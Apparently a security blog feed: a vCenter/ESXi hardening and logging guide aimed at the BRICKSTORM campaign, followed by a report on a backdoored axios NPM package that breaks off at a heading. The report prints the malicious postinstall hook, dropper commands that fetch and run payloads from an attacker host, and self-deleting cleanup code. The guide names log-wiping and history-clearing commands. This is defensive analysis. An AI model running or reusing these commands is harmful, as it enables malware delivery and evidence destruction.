Host-based firewalls should be used in tandem with network-based firewalls to achieve a resilient defense-in-depth posture. While network firewalls effectively manage "North-South" traffic (entering/leaving the subnet), they are blind to "East-West" traffic within the same VLAN. Host-based firewalls are capable of blocking an attacker sitting on the same network segment. By enforcing security at the individual endpoint, organizations can ensure that the access path does not grant logical authority over the vSphere control plane.

The VCSA Host-Based Firewall (Photon OS)

Managed via the Virtual Appliance Management Interface (VAMI), the VCSA firewall is a native control to prevent lateral movement from compromised "trusted" entities such as backup servers or monitoring devices that share the management VLAN. The firewall should be used as a primary layer of defense to enforce the "principle of least privilege" at the host network level.

Strategic Implementation: The default policy should be transitioned to "Default Deny." You should explicitly define authorized IP addresses for every management service.

Recommended VCSA Host-Based Firewall Scoping

Port

Protocol 

Source

Detail

UI / API (443)

TCP

PAW IP + Backup IP

Restricts vSphere Client access to hardened Admin stations.

VAMI (5480)

TCP

PAW IP Only

Prevents unauthorized SSH enablement or log tampering.

SSH (22)

TCP

PAW IP Only

Eliminates the primary shell residency path.

Heartbeat (902)

UDP

ESXi Management Subnet

Required for continuous Host-to-vCenter synchronization.

Internal (LADB)

TCP

Localhost (127.0.0.1)

Protects local inter-process communication.

ANY / ANY

ANY

DENY ALL

Blocks all unauthorized internal discovery.

VCSA host-based firewall

Limitations of the VAMI GUI Firewall

While the host-based firewall in the VCSA is a mandatory component of a defense-in-depth strategy, administrators should recognize that the standard VAMI GUI has the following operational limitations for defending against threat actors:

  • Lack of Port-Specific Granularity:The VAMI GUI lacks the precision required for a True Zero Trust model. In all versions, creating an IP-based rule for a specific server (e.g., a virtual backup server) forces an "all-or-nothing" approach. To grant that server legitimate access to the vSphere API on TCP 443, the administrator is often forced to trust that IP for all ports.

    The Risk: This simultaneously grants the backup server unauthorized access to highly sensitive management interfaces like SSH (22) and the VAMI (5480). If an attacker compromises the backup server, they inherit an unobstructed management path to the VCSA shell. 

  • Circular Administrative Dependency:A fundamental weakness of the native vCenter host-based firewall is its logical placement within the management plane it is intended to secure. The firewall is managed via the VAMI, which represents a secondary management entry point residing on TCP port 5480. This interface is logically adjacent to the standard vSphere Client (TCP port 443) and is frequently exposed across the same management network segments.

    The Risk: Credentials captured via BRICKSTEAL grant a threat actor authority to reconfigure the appliance itself. By pivoting to the VAMI, the actor can use their compromised role to deactivate the firewall. This circular dependency ensures the firewall is managed by the very application it is intended to protect, allowing a threat actor to disable controls using the system's own management tools.

  • Forensic Visibility Gaps:The standard VAMI firewall is designed for connectivity management, not security monitoring. It does not generate remote logs for denied connection attempts or specific shell activity.

    The Risk: This blinds security teams to active lateral movement. A threat actor can scan the VCSA from an unauthorized VM multiple times or use a VCSA shell unmonitored; because the firewall does not notify when it blocks a connection and shell commands are not logged, the SOC remains unaware of the intrusion attempt until the final stage of the attack.

  • Inbound-Only Policy Visibility Gaps:The GUI focuses primarily only on inbound traffic, leaving the Outbound (Egress) policy unmanaged.

    The Risk: Modern malware, such as the BRICKSTORM backdoor, relies on outbound "Phone Home" (C2) traffic to receive commands. A firewall that does not restrict outbound traffic allows a compromised VCSA to communicate with external malicious infrastructure without restriction.

To overcome these limitations of the native VAMI firewall, organizations are recommended to consider the transition from native vSphere GUI-based management to OS-level hardening using the underlying Photon Linux iptables or nftables.

  • Tamper-Proof Integrity: By implementing granular firewall rules directly at the Photon Linux operating system level, the controls become independent of vCenter application permissions. Even a compromised vCenter Administrator cannot disable Photon OS-level rules via the VCSA GUI.

  • Granular Logic: OS-level rules allow for strict "Source IP + Destination Port" mapping, ensuring a backup server only sees port 443 and is rejected on all others.

  • Transformation into a Sensor: Unlike the VCSA GUI, Photon OS-level logging can be "bridged" to a security information and event management (SIEM) which transforms every denied connection attempt into a high-fidelity, early-warning alert.

The VAMI GUI firewall should be viewed as a basic security control, not a comprehensive Tier-0 security control. To effectively mitigate the attack vectors required for advanced campaigns, organizations should bypass the vulnerable GUI and enforce a strictly validated, granular, and logged firewall policy at the VCSA Photon Linux kernel level.

aside_block
<ListValue: [StructValue([('title', 'vCenter Hardening Script'), ('body', <wagtail.rich_text.RichText object at 0x7f65cc4b8dc0>), ('btn_text', 'Get the tool!'), ('href', 'https://github.com/mandiant/vcsa-hardening-tool'), ('image', None)])]>

The ESXi Hypervisor Firewall

The ESXi firewall is a stateful packet filter sitting between the VMkernel and the network. Restricting individual services to authorized management IPs is the only way to block an attacker on the same VLAN from reaching the host API or SSH port.

Strategic Implementation: Access should be restricted at the service level by deselecting "Allow connections from any IP address" and entering specific management IPs.

Recommended ESXi Host-Based Firewall Rules

Service Category

Service Name

Port / Protocol

Authorized Source

Strategic Defensive Value

Management Access

SSH Server, vSphere Web Client/Access

22, 443 / TCP

PAW Subnet / IPs only

Ensures shell and GUI access is restricted to hardened admin PAWs.

vCenter Control Plane

vCenter Agent (vpxa), Update Manager

902, 80 / TCP

VCSA IP Only

Prevents unauthorized entities from impersonating the VCSA.

Intra-Cluster

vMotion, HA, Fault Tolerance, DVSSync

8000, 8182 / TCP, 12345 / UDP

ESXi Mgmt Subnet / IPs

Prevents interception of unencrypted RAM data and heartbeat tampering.

Storage

NFC (File Copy), HBR (Replication)

902, 31031 / TCP

VCSA IP + Cluster IPs

Prevents unauthorized VMDK extraction or out-of-band data cloning.

Telemetry

Syslog, SNMP, NTP, DNS

514, 161, 123, 53 / UDP

SIEM & Infra Subnets

Ensures telemetry and core services are bound to verified internal providers.

Legacy / High Risk

CIM Server, SLP (Discovery)

5988, 5989 / TCP, 427 / UDP

EXPLICIT DENY / Monitoring IP

Neutralizes RCE vectors targeting the primary attack surface used for ESXi-specific ransomware (VMSA-2021-0002).

ESXi host-based firewall

Hardening as a Detection Enabler 

When the infrastructure is configured with a "Default Deny" posture, it creates the friction necessary to expose a threat actor. In an unhardened environment, an attacker's port scan or lateral movement attempt is silent and successful; in a hardened environment, those same actions become indicators of compromise.

The Multi-Layered Signal Chain
  • Network-Level Visibility: Detection begins at the transit layer. Organizations should ensure that logging is enabled at the physical network and virtual switch (VDS) levels. This allows the SOC to track the "path" of a threat actor, identifying unauthorized scanning or connection attempts as they traverse subnets toward the vSphere management plane.

  • Host-Based Firewall Logging (IPtables): While the VCSA provides a management GUI for its firewall, it does not natively log denied access. To transform the appliance into a sensor, host-based firewall logging is strictly dependent on a custom OS-level IPtables configuration. By adding a logging target to the underlying Photon OS kernel, every rejected packet is recorded, providing the proof that an unauthorized threat actor is attempting to access the VCSA.

  • Immutable Logging: By enabling Remote Syslog Forwarding, these rejection logs are offloaded instantly. Even if an attacker eventually compromises the host, they cannot delete the local log sources.

Early Detection Signals

By correlating the denied access with identity-based events, organizations can identify a pattern of a BRICKSTORM lifecycle event in its earliest stages:

  • Failed Authentication Alerts: A log entry in the standard auth.log (for SSH) or a vCenter UserLoginSessionEvent showing a "Failed Login Attempt" from an unauthorized internal IP is a high-value alert.

  • Account Lockout Events: When an actor attempts to brute-force or use harvested credentials against local "break-glass" accounts (like administrator@vsphere.local), the resulting "Account Locked" event provides a high-priority signal that a targeted credential attack is in progress.

  • Behavioral Pattern Correlation: The most powerful signal occurs when the SIEM correlates these disparate sources. For example, a Firewall Drop (via IPtables) followed immediately by a Failed Login (via SSO) from the same source IP is a high-confidence indicator of an active intrusion attempt.

Network segmentation at the switch level is a prerequisite, but host-based firewalls are the primary enforcement point of a vSphere Zero Trust architecture. By complementing network-based firewalls with host-level filtering, organizations can eliminate the visibility gap on the management VLAN and transform the VCSA and ESXi hosts into sensors capable of exposing an adversary at the earliest stage of an intrusion.

Phase 4: Logging and Forensic Visibility

To facilitate the detection within the vSphere control plane, organizations should achieve comprehensive telemetry across the previously unmonitored layers of the underlying VCSA operating system.

The primary operational advantage exploited in this campaign is the lack of visibility inherent in the virtualization control plane. This monitoring visibility gap is driven by three critical factors:

  • The Logging Gap: By default, VCSA does not forward kernel-level audit logs. If an attacker wipes the local disk, the evidence of their residency is permanently erased.

  • The Restricted Logging Pipeline: Standard modern log forwarding agents such as Fluentd or Logstash are not supported for installation on the VCSA. To maintain appliance integrity, defenders are restricted to using the native rsyslog daemon. This prevents on-host log enrichment or advanced parsing, forcing the SIEM to process raw, legacy data streams. This technical complexity often leads to critical kernel-level signals being misclassified or ignored.

  • Operational Telemetry Fragmentation: Security indicators are frequently buried within standard cluster and application level events. As detailed in the vCenter Event Mapping, critical actions like VmNetworkAdapterAddedEvent or VmClonedEvent are logged as routine infrastructure management tasks. Because these signals are operational rather than security-focused, a threat actor's movements are easily disguised as routine tasks.

Securing the VCSA requires a transition from passive cluster monitoring to active OS-level hardening, utilizing a 'Default Deny' posture to eliminate the network path often exploited during advanced campaigns. This architectural shift transforms the appliance into a proactive security sensor, where the friction of blocked network activity and initial access serves as a high-fidelity indicator. By moving beyond complex vSphere application telemetry, organizations can generate the precise early warning signals needed to expose a BRICKSTORM intruder at the very moment they attempt unauthorized discovery.

What is auditd?

The Linux Audit Daemon (auditd) is the kernel's primary subsystem for tracking security-relevant events. Unlike standard "system logs" (which record application and management events), auditd records system calls. It sees exactly what commands were executed in the shell, which files were modified, and which users escalated privileges. The default Photon auditd rules cover Identity (useradd/del) and privilege escalation (sudo/privileged).

auditd Status: Verifying the Current Defensive Posture

auditd is the core forensic foundation for detecting low-level movements. While VCSA Photon logs provide visibility into management tasks, they are fundamentally blind to the "living-off-the-land" (LotL) techniques that define this campaign. This threat actor operates deep within the VCSA shell to execute binary injections, modify startup scripts using sed, and utilize sudo to fuel the BRICKSTEAL credential harvester. Only auditd, by recording the underlying system calls (syscalls), provides a granular record of these command-line maneuvers. In an environment where traditional EDR is absent, auditd captures the minute behavioral patterns that standard logs ignore.

The Default Configuration Gap

Modern VCSAs (vSphere 7 and 8) ship with a pre-configured set of STIG rules (located in /etc/audit/rules.d/audit.STIG.rules). However, there is a restriction in the default configuration:

  • Local Only: By default, auditd writes to a local file (/var/log/audit/audit.log).

  • Invisible to VAMI: The remote logging you configure in the VAMI (Port 5480) does not include these kernel logs by default.

  • The Attack Vector: Actors can gain root access, perform their actions, and simply run rm -rf /var/log/audit/* to delete the evidence. Unless these logs are streamed to your SIEM in real time, your forensic trail is non-existent.

  • Local Log Rotation: Since the local log location is /var/log/audit/audit.log, it is subject to rotation and deletion. If an attacker wipes this file, the remote syslog version is your only forensic record.

All auditd logs should be forwarded via the VCSA remote syslog. Remote forwarding of auditd is dependent on a "auditd bridge" configuration. If /etc/audisp/plugins.d/syslog.conf is set to active = yes, these logs will be tagged and forwarded. If set to no, they are stored locally only. To enable remote logging of auditd events and ensure forensic persistence, the following steps should be taken:

Step A: Check Service and Rule Status

Before activating the auditd remote logging bridge, you should determine if your VCSA is currently configured for auditd. Run these commands as root:

# 1. Check if the audit service is active
systemctl status auditd

# 2. List the rules currently enforced by the kernel memory
auditctl -l

If auditctl -l returns nothing, your rules have not been loaded, and the kernel is not "watching" for attacker behavior.

Step B: Check the "auditd Bridge" Status

Verify if kernel events are stored on the local disk or being forwarded to your remote SIEM.

# Check the active status of the syslog plugin
# Note: vSphere 8 still uses the /etc/audisp/ path for compatibility
grep "^active" /etc/audisp/plugins.d/syslog.conf

If this returns active = no, remote logging of auditd is not configured. The logs are sent only to the VCSA local disk where an attacker can easily wipe them.

Mapping Standard STIG Rules to Attacker TTPs

If your auditctl -l output shows the standard rules are now loaded, you have the following rules in place mapped to identified attacker tactics, techniques, and procedures (TTPs). These rules move you from periodic auditing or threat hunting to real-time behavioral detection.

Standard STIG Rule / Key

TTP Phase

Defensive Value

-k useradd / -k userdel

Establish Foothold

Creates local accounts, deploys backdoors, and deletes them within ~13 minutes. These rules log both ends of this rapid lifecycle.

-k execpriv (execve syscalls)

Binary Execution

Triggers when the actor executes unauthorized binaries (e.g., pg_update, vmp) with root privileges.

-k perm_mod (chmod, chown)

Weaponization

Actors use sed to inject code into startup scripts and then run chmod +x. This rule triggers the second the script is made executable.

-k privileged (sudo, su)

Credential Theft

BRICKSTEAL requires sudo to scrape memory and config files. This logs the original user ID even if they escalate to root.

-k modules (init_module)

Establish Persistence

Logs attempts to load malicious kernel modules or persistence drivers into the Photon OS.

-k shadow / -k passwd

Anti-Forensics

Logs any manual edits to the system's identity files used to create "trapdoor" root users.

Mapping of STIG rules

Activating Remote Logging for auditd

Step 1: Enable the Syslog Plugin

The Audit Dispatcher (audisp) should be configured to send events to the local syslog service so they can be forwarded via the VCSA remote syslog.

# Use sed to change the status from 'no' to 'yes'
sed -i 's/^active = no/active = yes/' /etc/audisp/plugins.d/syslog.conf

# Verify the change
grep "^active" /etc/audisp/plugins.d/syslog.conf
Step 2: Restart the Audit Daemon

You should reload the service to initialize the dispatcher and the syslog bridge:

kill -HUP $(pidof auditd)
Step 3: Verify the Bridge Is Operational

Check the local system messages to ensure the plugin has started successfully:

grep "audisp-syslog" /var/log/messages

You should see a message indicating the plugin has initialized or started.

Step 4: Confirm Logs Are Forwarded
journalctl -f | grep audit

You should see events with msg=audit prefix.

Syslog Tag (Key): In your SIEM, you should search for the field msg=audit followed by the key="XYZ" (e.g., key="execpriv"). This allows you to filter out of standard system logs and focus only on high-fidelity security events.

Additional Auditd Rules

Based on a default audit.STIG.rules output contained in the Photon OS 4.0 STIG auditd config, these three rules should be added.

Recommended Rule Addition

TTP 

Detail 

-w /usr/bin/rpm -p x -k software_mgmt

Malware Deployment

Detects SLAYSTYLE: Logs the execution of the RPM installer. Essential for spotting the deployment of unauthorized tools or malicious packages.

-w /etc/init.d/ -p wa -k startup_scripts

Establish Persistence

Detects Startup Injections: Directly identifies the sed-based modifications used by threat actors to ensure backdoors survive a reboot.

-w /root/.ssh/authorized_keys -p wa -k ssh_key_tamper

Establish Persistence

Persistence Sensor: Any write (w) to the root SSH directory is inherently suspicious and detects the "trapdoor" persistence TTP.

Additional STIG-based rules

Advanced Intrusion Detection Environment (AIDE)

While auditd provides low-level monitoring, AIDE serves as the source of digital validation for the VCSA. AIDE is a host-based file integrity monitoring (FIM) tool that is considered the industry standard for high-security Linux environments and is a requirement for DISA STIG compliance (PHTN-40-000237).

Note: Mandiant recommends organizations perform comprehensive testing and fine-tuning of these rules within a staging environment before production deployment to account for variations in specific vSphere configurations and operational workloads. Proper calibration of monitoring thresholds and file exclusion lists is essential to achieve an optimal signal-to-noise ratio and ensure high-fidelity alerting of unauthorized modifications.

Why AIDE Is Essential Alongside auditd

Relying on a single telemetry stream is insufficient to counter the sophisticated tactics of BRICKSTORM. By pairing AuditD's behavioral auditing with AIDE's cryptographic integrity checks, organizations establish a mutual defense that reduces an attacker's ability to operate undetected.

  • auditd (Behavioral Monitoring): Captures the action (e.g., "Root used sed to modify a script"). If an attacker achieves high-level privileges and "blinds" the audit service or wipes the local logs, the behavioral trail is lost.
  • AIDE (State Monitoring): Captures the result. AIDE creates a cryptographic baseline (DNA fingerprint) of every critical system file. It does not care how a file was changed or if the audit logs were wiped; it only cares that the file is no longer authentic.

Using AIDE Alongside auditd

The following steps walk through how to verify the current AIDE integrity foundation, add BRICKSTORM specific detections, and establish an immutable cryptographic baseline.

1: Diagnostic Assessment

Before modifying the environment, you should confirm the AIDE configuration status. Log in to the VCSA via SSH and run these commands as root:

Confirm AIDE is installed and compiled with the required config (WITH_AUDIT and SHA-512).

# Check version and compiled options
aide -v
2. Verify the AIDE Database

AIDE requires that a cryptographic baseline (snapshot) exists. Check the status of the database:

# Resolve the database directory (typically /var/lib/aide)
grep "@@define DBDIR" /etc/aide.conf
# Check for the active database
ls -lh /var/lib/aide/aide.db.gz

If aide.db.gz is missing, you have no baseline. If it exists but the timestamp is months old, your integrity foundation is stale and will produce high-noise alerts during a check.

3. Audit Current AIDE Coverage 

Determine which parent directories are currently being monitored by the default rules:

# Filter for active file selection rules
grep -v "^#" /etc/aide.conf | grep "^/"
4. Editing AIDE Rule Set for BRICKSTORM Coverage 

Open the configuration file.

vi /etc/aide.conf

Append these BRICKSTORM specific rules to the bottom. Use the STIG rule group to ensure SHA-512 enforcement.

# --- BRICKSTORM TARGETS ---
/root/.ssh              STIG    # Detects unauthorized SSH
/lib64                  STIG    # Detects system-level libraries
/etc/aide.conf          STIG    # Detects tampering with AIDE
/etc/audit/             STIG    # Detects attempts to edit config
/etc/audisp/            STIG    # Detects attempts to sever bridge

Append the file for log exclusions to reduce noise [the ! should come before the rules that tell AIDE to watch the parent folders (like /opt or /etc)].

# --- NOISE REDUCTION: EXCLUDE DYNAMIC LOGS ---
!/var/log/.*             # Ignore all standard logs
!/opt/vmware/var/log/.*  # Ignore vCenter-specific service logs
!/var/lib/.*             # Ignore dynamic database/state files

Note: Remove all # from append statements.

5. Initializing the AIDE Database

Once the rules are defined, you should generate a new cryptographic snapshot. This should only be performed when the VCSA is verified clean (e.g., immediately after patching).

# 1. Initialize the new fingerprint database
aide --init

# 2. Activate the database
mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz

Copy the aide.db.gz to a read-only, off-box location. Comparing the VCSA against an off-box "Gold Image" ensures that even root-level attackers cannot hide their modifications by re-initializing the local database.

6. Enable the Remote Logging of AIDE Events via Logger Pipe
# Run a check and bridge the output to Syslog/SIEM
aide --check | logger -t AIDE_TRAP -p local6.crit
7. Enable Automation of AIDE Database Check

To move from manual oversight to automated alerting, you should establish a recurring scheduled task. This ensures that the VCSA programmatically verifies its own state and reports any discrepancies.

Open crontab:

crontab -e

Add the following edit to configure the task:

# Execute check every 6 hours and send results via VCSA remote syslog
0 */6 * * * /usr/bin/aide --check | logger -t AIDE_TRAP -p local6.crit
8. Conduct a Test Event

To confirm your defense is operational and your SIEM is successfully receiving AIDE alerts, perform a simulated breach.

Add a comment to a monitored area (e.g., /etc/rc.local):

echo "# Forensic Bridge Test" >> /etc/rc.local

Trigger a remote event trap:

aide --check | logger -t AIDE_TRAP -p local6.crit

Verify the Alert: Check the VCSA remote syslog target for the tag AIDE_TRAP:

AIDE found differences between database and filesystem!! followed by Changed files: /etc/rc.local.

VCSA Shell History 

On a Photon-based VCSA, the /root/.bash_history file is not replicated to any other log file, nor is it sent to a remote syslog by default. This represents a major forensic visibility gap that threat actors take advantage of to maintain their unmonitored persistence.

  • The Buffer Issue: Commands typed into the shell are kept in a memory buffer. They are only written (appended) to the physical file on the disk when the user logs out of the session.

  • The Anti-Forensics Risk: If a threat actor gains shell access, their first move is often to run unset HISTFILE or history -c. This prevents the memory buffer from ever being written to the disk. Even if the file is written, an attacker can simply run rm /root/.bash_history before exiting.

  • No Remote Transmission: Standard VCSA syslog configurations monitor directories like /var/log/. They do not monitor hidden user files like .bash_history.

The reason the auditd remote syslog discussed in the previous steps is so critical is that it bypasses the need for .bash_history entirely. auditd intercepts system calls (syscalls) at the kernel level and exfiltrates detailed forensic data including the original User ID (AUID) and command outcomes to a remote SIEM as the command is executed. This bridge ensures that even if a threat actor purges local logs or crashes the session, an immutable, real-time audit trail remains securely preserved off-appliance.

Logging Design Principles

Recent CISA reporting and GTIG analysis describe threat actors abusing management interfaces (including enabling SSH), making persistence-related configuration changes, and using vCenter capabilities to access high-value virtual machines. An organization's logging strategy should therefore prioritize management-plane audit trails, service-state changes, identity events, hypervisor telemetry, and centralized forwarding.

  1. Centralize first, then tune. Forward logs off-host in near real time so an attacker cannot tamper with them by wiping local disks. Configure both VCSA and ESXi to forward to a central syslog/SIEM target.

  2. Treat logs as Tier-0 data. If vCenter is Tier-0, then vCenter/ESXi logs are also Tier-0. Restrict who can read them, who can change forwarding settings, and who can stop logging services.

  3. Make timestamps defensible. Ensure consistent Network Time Protocol (NTP) across VCSA, ESXi hosts, jump boxes, and log collectors so correlation is reliable during an incident.

  4. Log the actions that matter, not everything. For threat actor activity, you care less about generic "system is running" noise and more about: who accessed management, what changed, what was cloned/exported, what services were enabled, what binaries/configs were modified, and where the appliance/host talked to on the network.

Organizations should establish a "vSphere logging fundamentals" previously described by Mandiant by offloading all infrastructure logs to a centralized, remote SIEM. 

The vSphere Unified Logging Architecture

The following summary table provides a definitive map of the vSphere telemetry streams described. By implementing these steps, organizations can move from a single localized log to a multilayered remote detection architecture that covers the entire BRICKSTORM malware lifecycle.

Type

Forensic Layer

Signal Observed 

TTP Phase

Detail 

vCenter Application Events

Management Plane (API/UI)

Programmatic Event IDs: VmClonedEvent, VibInstalledEvent, HostSshEnabledEvent

Initial Access / Exfiltration

Tells you "What" high-level action was performed (e.g., a domain controller was cloned) and the Admin IP responsible.

Identity (SSO) Events

Identity Layer

Principal Events: com.vmware.sso.PrincipalManagement

Establish Persistence 

Detects "Who" was created. Specifically catches the transient accounts used as deployment vehicles for backdoors.

AuditD Kernel Logs

OS Kernel (Photon OS)

Syscall Keys: key="execpriv", key="useradd", key="privileged"

Establish Persistence 

Tells you "How" the shell was used. Captures commands typed by an intruder (e.g., sudo, sed, rpm) even if they delete their bash history.

AIDE Integrity 

Filesystem

Syslog Tag: AIDE_TRAP stating: "differences found between database and filesystem"

Establish Persistence

Tells you "What was modified" to ensure residency. Detects physical changes to binaries and startup scripts that standard logs miss.

IPtables OS Firewall

Network Layer (Host-Based)

Kernel Message: VCSA_FW_DROP + Source IP + Destination Port

Initial Access / Lateral Movement 

Tells you "Who is probing?". Identifies compromised internal VMs attempting to scan or brute-force VCSA management ports (SSH/VAMI).

vSphere VCSA logging
Implementation Best Practices

For both the VCSA and ESXi hosts, the implementation of remote syslog should move beyond legacy, unencrypted protocols. The following standards are required to ensure the integrity and survivability of the forensic trail:

  • Encryption via TLS (TCP Port 6514): Sending logs over UDP/514 is insecure and unreliable. Threat actors can access management traffic or spoof log entries. Organizations should enforce TCP with TLS encryption for all syslog traffic. This ensures that logs are encrypted in transit and guarantees delivery through the TCP handshake.

  • Certificate Validation: To prevent man-in-the-middle (MitM) attacks on the logging pipeline, the VCSA and ESXi hosts should be configured to validate the SSL certificate of the remote syslog server. This ensures that telemetry is being sent to a verified security authority and not a rogue listener controlled by the attacker.

  • VCSA Custom Shell Bridging: Because the VCSA does not forward shell activity or denied firewall connections by default, administrators should consider implementing an agentless bridge at the Photon OS level. By configuring the audisp (Audit Dispatcher) and piping iptables logs into the native rsyslog service, the VCSA is transformed from a passive appliance into an active sensor, capable of streaming real-time kernel-level alerts directly into the encrypted TLS pipeline.

  • Standardized Retention: Given this threat actor's dwell time averages 393 days, the remote syslog repository should be configured with a minimum retention period of 400 days. This allows investigators to correlate the programmatic eventTypeId of a year-old initial compromise with the low-level auditd signals of a current breach.

Summary of Logging Detections

Attack Phase

TTP

Key Forensic Log Source(s)

Technical Detail 

Initial Access

Edge Appliance Exploitation

Tomcat Audit Logs: /home/kos/auditlog/fapi_cl_audit_log.log

Detects requests to /manager/text/deploy (CVE-2026-22769) to deploy malicious WAR files like SLAYSTYLE.

 

Reconnaissance & Scanning

VCSA firewall_audit: SSH_BLOCKED_NEW, WEB_BLOCKED_NEW, VAMI_BLOCKED_NEW

Identifies attempts to probe management ports (22, 443, 5480) from unauthorized, non-whitelisted IPs.

Lateral Movement

Credential Abuse

Windows Event 4624 (Type 3); VCSA firewall_audit: ALLOWED SSH

Detects network logins from appliance IPs using stolen service account credentials.

 

Stealth Pivoting (Ghost NICs)

vCenter Events: VmNetworkAdapterAddedEvent (8.0u3+) or VmReconfiguredEvent

VmNetworkAdapterAddedEvent is a high-fidelity "Critical" signal for bridging VMs into restricted networks. Legacy builds use VmReconfiguredEvent to track unauthorized NIC additions.

Takeover

Management Interface Access

VAMI Logs: /var/log/vmware/vami/vami-httpd.log

Records POST requests to /rest/com/vmware/cis/session followed by SSH enablement via PUT requests on port 5480.

 

Interactive Shell Escape

SSO Audit (PrincipalManagement); VCSA SHELL_COMMAND

Monitors membership changes to BashShellAdministrators to escape VAMI to bash; tracks interactive commands like whoami or netstat.

Persistence

Startup Script Injections

AuditD Key -k startup_scripts; VCSA init files

Detects sed commands modifying /etc/sysconfig/init or /opt/vmware/etc/init.d/vami-lighttp.

 

Transient SSO Accounts

SSO Audit (audit_events.log)

Rapid creation and deletion of local accounts (e.g., in vsphere.local) used solely for malware deployment.

 

Filesystem Integrity / Binary

AIDE Monitor (AIDE_TRAP); AuditD Key -k execpriv

Detects physical changes to binaries in /lib64 or /root/.ssh and execution of unauthorized binaries like vmsrc.

 

Rogue "Ghost VMs"

AUDIT log

“vmx -x” /var/log/shell.log

“/bin/vmx” /var/log/shell.log

Detection of unregistered virtual machine files (.vmx) hidden from standard management consoles.

Credential Theft

Tomcat Memory Scraping

vCenter Web Logs; AuditD Key -k privileged

Monitors HTTP requests to /web/saml2/sso/* (BRICKSTEAL); tracks sudo usage for scraping memory or DB credentials.

 

Offline NTDS.dit Theft

vCenter Events; vCenter VPXD Logs; ESXi hostd.log

VmClonedEvent or VmBeingClonedEvent targeting domain controllers followed by VmDiskHotPlugEvent to mount disks offline to extract the ntds.dit database.

Exfiltration

C2 & Data Tunnelling

VCSA firewall_audit: INTERNET_BLOCKED, ZT_OUTBOUND_DENIED

Captures VCSA attempting unauthorized outbound calls to external C2 nodes via SOCKS proxies or DoH.

Mapping of logging and detections

Conclusion

It is critical for organizations to recognize that the vCenter Server control plane is a primary target for state-sponsored espionage and global ransomware operations. Technical hardening is essential to create the friction required to generate high-fidelity signals. By enforcing barriers such as VCSA OS-level firewalls, phishing-resistant MFA, and restricted management interfaces, organizations force a threat actor to attempt actions that are inherently suspicious.

Addressing forensic visibility gaps through the implementation of auditd, AIDE, and centralized remote logging ensures that evidence of persistence is preserved for incident response activities. Organizations should leverage this enhanced telemetry to build pattern-based behavioral detections rather than relying on static Indicators of Compromise (IoCs). As adversaries increasingly leverage AI across the entire attack lifecycle, the hardening and logging controls outlined in this guide should become the universal vSphere security baseline to ensure every unauthorized movement results in an immediate and immutable forensic response.

North Korea-Nexus Threat Actor Compromises Widely Used Axios NPM Package in Supply Chain Attack

31 March 2026 at 16:00

Written by: Austin Larsen, Dima Lenz, Adrian Hernandez, Tyler McLellan, Christopher Gardner, Ashley Zaya, Michael Rudden, Mon Liclican, Muhammad Umair


Introduction 

Google Threat Intelligence Group (GTIG) is tracking an active software supply chain attack targeting the popular Node Package Manager (NPM) package "axios." Between March 31, 2026, 00:21 and 03:20 UTC, an attacker introduced a malicious dependency named "plain-crypto-js" into axios NPM releases versions 1.14.1 and 0.30.4. Axios is the most popular JavaScript library used to simplify HTTP requests, and these packages typically have over 100 million and 83 million weekly downloads, respectively. This malicious dependency is an obfuscated dropper that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.

GTIG attributes this activity to UNC1069, a financially motivated North Korea-nexus threat actor active since at least 2018, based on the use of WAVESHAPER.V2, an updated version of WAVESHAPER previously used by this threat actor. Further, analysis of infrastructure artifacts used in this attack shows overlaps with infrastructure used by UNC1069 in past activities.

This blog details the attack lifecycle, from the initial account compromise to the deployment of operating system (OS)-specific payloads, and provides actionable guidance for defenders to identify and mitigate this threat.

Campaign Overview

On March 31, 2026, GTIG observed the introduction of plain-crypto-js version 4.2.1 as a dependency in the legitimate axios package version 1.14.1. Analysis indicates the maintainer account associated with the axios package was compromised, with the associated email address changed to an attacker-controlled account (ifstap@proton.me).

The threat actor used the postinstall hook within the "package.json" file of the malicious dependency to achieve silent execution. Upon installation of the compromised axios package, NPM automatically executes an obfuscated JavaScript dropper named "setup.js" in the background.

 "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "postinstall": "node setup.js"

  }

Malware Analysis 

The plain-crypto-js package serves as a payload delivery vehicle. The core component, SILKBELL, setup.js (SHA256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09), dynamically checks the target system's operating system upon execution to deliver platform-specific payloads.

The script uses a custom XOR and Base64-based string obfuscation routine to conceal the command-and-control (C2 or C&C) URL and host OS execution commands. To evade static analysis, it dynamically loads fs, os, and execSync. After successfully dropping the secondary payload, setup.js attempts to delete itself and revert the modified package.json to hide forensic traces of the postinstall hook.

Operating System-Specific Execution Paths

Depending on the identified platform, the dropper executes the following routines.

Windows

The dropper actively hunts for the native powershell.exe binary. To evade detection, it copies the legitimate executable to %PROGRAMDATA%\wt.exe. It then downloads a PowerShell script via curl using the POST body packages.npm.org/product1 and saves it to the user's AppData Temp directory (e.g., %TEMP%\6202033.ps1). The payload is executed using a copied Windows Terminal executable with hidden and execution policy bypass flags.

Set objShell = CreateObject("WScript.Shell")    
objShell.Run "cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak[.]com:8000/6202033 > %TEMP%\6202033.ps1 
  			  & %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1 http://sfrclak[.]com:8000/6202033 & del ""PS_PATH"" /f", 0, False
macOS

The malware uses bash and curl to download a native Mach-O binary payload to /Library/Caches/com.apple.act.mond using the POST body packages.npm.org/product0. It modifies permissions to make the file executable and launches it via zsh in the background.

try
    do shell script "
    	curl -o /Library/Caches/com.apple.act.mond 
  		-d packages.npm.org/product0 
		-s http://sfrclak.com:8000/6202033 
  		&& chmod 770 /Library/Caches/com.apple.act.mond 
	  	&& /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &" 
  		&> /dev/null"
    "
  end try
  do shell script "rm -rf tmp/6202033"
Linux

The script downloads a Python backdoor to /tmp/ld.py using the POST body packages.npm.org/product2.

Cleanup 

Aside from removing downloaded scripts in two execution branches, the script attempts to remove itself and replace an injected package.json with an original one, which was stored as "package.md".

const K = __filename;
t.unlink(K, (x => {}))
t.unlink('package.json', (x => {})), t.rename('package.md', 'package.json', ord)

WAVESHAPER.V2 Backdoor Capabilities

